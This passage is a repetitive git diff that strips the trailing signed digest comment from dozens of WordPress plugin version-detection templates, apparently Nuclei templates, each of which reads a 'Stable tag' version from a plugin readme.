2c4a03bcf7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080619cbc37369e98fc8695ca7467868d6a48d734ce477ad7cfe559193de53a6a022038d7c327beaac2499fd2e30db452ac16a5840b3d42019fa92bba67d5a967426a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 68d2a1a26c..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047fcc88d3da313a9673cd63e2cd365300017fc3ec02846ccca6333227f14db9c022100f2564d5ecbfbc2fbedd6635cf79a8d93734bbb5aa72dca054e283d15fea08718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 59cf690ea2..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aee69066b5f6b597d9cc70574a5b02710a5d09e171b9ddfb0bb4a7e8744c7a78022100c11e9c78a22074a97f017c70eca3180c2584d38b926ca600a56df479a024423d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index d4b7e8bf2e..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220729cd6617b0b9a58575270e36cf167cc297961e71aa688719ef73c2d89fe6b9d022068d8a141f6cefb5ab5bc21839a4dd6672fa0af53b1746c4071d3b917c686c6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 3f53a2b2a4..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8597188b8bfffaddb0eb824e06e098bf57624f58fb935185f1ce90282f467c802210092e56ea370a342d131a874229a5f682ebd4c9abf672638cdaa93e2bf69e3845e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 50e0f5d8ea..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a77f84d600f4cbac3db2095a904065a56da152c4619c834abd8d08936b792618022100fa8fe5904d929c272d90f961fdbecec82cee14948e1354c3078bdef250cb05d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index e5f1a1e880..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d60cbbe15c8f1055deb72d96660e8d3387ba4e022c5fd628b8a37e8200cdbbb9022028c80a3cb7e6fc48d87956387fce789b40a3f06863d7435772220ae8b964282a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 14fcfe61a2..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7ae9a80417b8ab0f2d0a558652dbf5f7ba35eaf7f7655cb0c29b868cea601a9022053597f005a373aa67897eb299a5a8247548952b043c7e5224443056fa0c8c4f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index e7b34ee187..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040cc0cae0725a77fb85faf564f018e3ba9409d4c56ebe2317a01b6821d07f002022002cdc60cc1ed2577c8de46405c6de433bc19bf9b939623d1bf09a53f94987f46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 9a80d2a188..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205386bb1de2d1489c57025ca2a9e7b44962339904b5c27abb8b476c8e151095250221009c93404a21a226af82ac1d3764af223acc5cce560c828898ab9c1e79c3e7a325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index c3a0d13b01..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206706ed9d55bf875b7ddb9be409f6a753e98ada45a7d0ebf9ce4a295d43eebdb7022100d7f5fd7fc2d93953e4aaba5f86fc814b82acfdfa24f86051f54372a6252dad05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index e589f85267..cd248e018b 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da947161870658533b1bbe08237f126738d66906947fc84bc52673a0326a1824022032d93a500e70acefff402b1eb53e0b23aad66a8756f94f88a214729ffc61dc90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index a1055bfddf..0993372ced 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ff892162e68ef40438cc13afe03f058620f46adab1fe26620741c6daffc2c0a022100bc0cb33aca097f3877ca65acfc4dd13e5053203a25e432af55202fbbf34fe647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index f2e8f5150e..7e62a84cca 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040b3c947c865ecbde38f11055452d6bfe58e3350d47621c90514a09b4c271ef2022050df3379a2632c33de4f72c3c3ea91255ad6c7c95647fac2f88dcfbd74022dbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 5125ced39e..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220449efd7243af3eb0250a3b1117d85bf25f4c7714f9e68e9adbe85c825cd886fb022100aad7121c205b8abdd66c14977d13b4cc09c819f80389e56fa2de98976eff9679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 856a8ef032..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062894e23f28c26e096b492e515297b1f54b60cebcd7a6ca96c5a1715d0fbf4040220200247ed40cc4d3c711f983549162dfb269083b0889286942b6926a971bc815c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index fd1add5df0..c7ae2d51dd 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d32e8ca3e9f9e8b78dbbc6d6417b6dce053f6174a850d2349a0695f188aed3d90220514aad2d6cc88a2d215d9f918959ab2083f838ef5cdfcf19e3796d334f1d5260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ad5b7900c..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207509d92eaf5a6a76a2d6033f8bddfc8ec878142b61f6c978585f808a089e801d022100c60e7eb1339c92e6a3598e0a0cd2c065d6b75493f519702417af716313adf1b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index fb34ffb29e..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046988b41d7495e1f8d3c1f8a79298b0f91e97a842ee58cda8c97be10518653ce02200be26bcce712e16b54d6b404473464c8e3729547ff2f9e511e5d58aee3f2e40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 60e2bd74d6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205af48ab5f631beeb0c65df80d301363a95b3dc875a005ed8fab72e24cbef9805022100aab0f0d0b0d2842aef864d9bc0b0d2e19b8a34ef35dd52c400e0ece167bb917a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 99d841f036..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f8e7e576227dbd12055cb9825bf78608b46a69cb113de41f33d98a84766e6c0022100e91f1b1730f38ef06ba0d48e0a40e71740b5f911489e187af2c76bd44bb150b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index aad90ed6a9..299e5e4cb6 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e41bb975d8b59cbe413b1eaef6164842dccde758eef4f2b459bef49912d139ee022058c8eebf090d2204fb80b91e714f54bb64ca33175492f17daf68e768279d1d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index a59f7d6262..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062f3c8dcf386e8f9a3bc9bb22c098c4b8634f74529ed3dcf0c3274e51c9e8766022040e2f4f2cbc748558faea3ffb535d9a5d43b4dca71e3b1f71077558699f4fe18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index afa166d5f5..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e9670a7e3ba68728ede2de22dd99c1496546a3654672104483afeb5a8b6b956f022100aac593b766fb6bfc9d5d56045d714425e2170ded92d76b8870680c9318e43e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 19ac7b4a1f..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb381a26aea4736c540761e37d89d359924bdbeda7457e0239a84dc5a2b451e802205a8ea279c5857fbdabafef8f621e244776ff07c1fd37a1682d2446fb06494fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index d847199d5e..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d88c7736ec1edaf42298175ad0fe26b2d5614c009c56ea6e722e3394fe8cfb05022022e5e46e6cc06331825bd17d34896fb325e7d48d3acd3ccefc9a2e3b5a45005a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index bf3e30d2d5..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c9e5dd34340cd5d6ecdd7c26e05e09e3cc0e4df6f272a43b190bd0ad8c4485c022100ee7e68b029d4b1c4b0f2aee4de03071d5d63758af582691923dfc84d2e2a2103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6c6cff3d22..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022feee1ddd38107cf76fffcdcd1f5d04fa7a31c27feb1d426766f5838363dee9022100a64e07230a6644a059478f69b751e34ca93073af3eb32a0128fdc013410c69f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 339b69c901..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039ea4539d45a35f8de9299c1cd4f026fdfe4d79e4628f0e253e75dde70e3f6a902205e178e5882575ce4b54c5854e9cda699588d8849d0cc4a0141136930c67ebf41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 3078756735..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206c27340e10565ca2c1be255e539534d7fa56407c16c9cb677ce1c0a5aca59412022100c07e8dbf5af6b009eb3521b6dba5b8400c2c3e4190646c92da3f7c48caddd3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 326a2bb42a..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9ae6f5497d984115878c1cd018ea925661dbd8c71be5c657e32dd4bb7cc241102203912136c1176a9c0965d12c5f0866f84544a0d221c3b46d84144a775b4f0caa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 25121d6d88..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022008937587f3a2692ce7b634931cd6f4f0e53bc2654a015a293bed5f89e7ffaad7022043fc2166fbbcde0141b37cc8bb07f787f1bf96f7a6da6630e787f73bb89be95e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 92df487473..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084e21cdd9e6fa26e69911826bdcfbf545f7d5358700b7d393b6398d4500574270220083e59a1d053bc407f606b0c5f6a6786f0925973fb2f8e23c5cd915e5bdc25d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 83992ce806..5685dd5f08 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220795dddaab388cd3286a8b6e70d8452e8eb046eccf2e5f7f8aad4dde299105047022075cf3e5b0feceaee65fef9ea79d88f6eb0eba45c661c7fc59bbdfd31d1c9440a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 1bd1779410..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203c854b9f15af0e57130eb5cedcbb73f42ef374adea28349ab24d6dc66d01229502203d4d88ff472ea4cf80964256778a53d26620511a7f84545f8027ddc06cc2c85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 69955d959d..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204d969b760ce843a3f1842a6a86c170fe7e59e4c90ea8c63ca0acf3ccd94332bb022100f729d89026c9da916977cf75d1ba1a5b54e32eb1884f39ab4d4e8b902db83d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 87b3d7197f..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022034608003b626c93d6b591339eac09be1c1d636fcf3b55ab9bfcb1a0080edf15f02210089987f0d0fcdc3be5d8d1435336374928ca45e0a0292132469714c19d1d91813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 3dddb19994..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063c49b3389666d24c003d16e34f53a64bd1869d1f8ef391f661a2bc650812bb5022100dc61c7a54aabecf197b0d32fa6b6488cca1eccbac7f9b3ed1ef1e019f0889e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 8c3a0849c3..effba09471 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3b79e1b257adc894a9f8dfbe1a219b8eae0447d26a0920f5e5c7861ab649e9c022100938f99f174d33a821043f3a819edebfc6b60c186f7f0fbfeebc9a8ff46b674b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 22872d6b66..37153b7ae5 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049962cbe795347638563e9aef043effec57e1794d179a84b8e7dcf6ec242c100022100d3807b3549c5cc34b2fba785781c32d977db4caf4c54d7168ed903379d6dfa74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 832e75d5a5..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220470c000df6b877280599eca7ed8af3bd2b23ee9cfa30b5ebbbf804cf208bb791022077c307a258328badc6029ad958c11961d0804e5d6f30ac9665c3f0a0016a97fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index a60284d27c..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202547a3d18160eb57b2fc8ea1d3f2788a2a0e957595db9da8ca5de9026c4f938c022100b41dbfb3cb5f00323a595912835afd33fde93d7122274f195c2823af4a7d4d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 9933281d76..3462f5ea6b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100881c7406e9610c49dcad2f0719487b6a1669c84b4198fae62f07798c2e5e4e79022100a1fba67ce35f2a50768c4ca6da3e1b20153839ea3d68bf69e337288254d86361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d6dcfaed31..5c9ae8bc4f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6c278253c442684a6423c8c3c3c35757ad92d6ef0b7e380cc8265e4a79671b102207ae810004897bff25b5c911eb085d7d5f6f747ea9b89dced47ce535dd40cadf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index ce4f7ffdfa..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050fec3edeae70d12cb6d9b95598fde8e58795384ca01fd73731b320830f419410221009574c0de7f656ede4f0d0eaa68eff4e50534152391b73057b59cd5688549cf82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 896a2ff198..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c917724b7b1b2de053823851a023797425be38d0c4aa4c01a4274b9fda79fae1022100a53be5c61ce0b3978b37a721202cda1a662d0290c71dcdea31e797b4ec1d74fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 0604fc1dc5..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207cb161055f7ddfe99ecbfd3f87bc0186db51fba105281cde5049fbf89a711ae902210087df7cee02b03a8598f811fd012a4e7a0e17f4bc69a1775f940fd6ee40d945f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 920acc4248..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 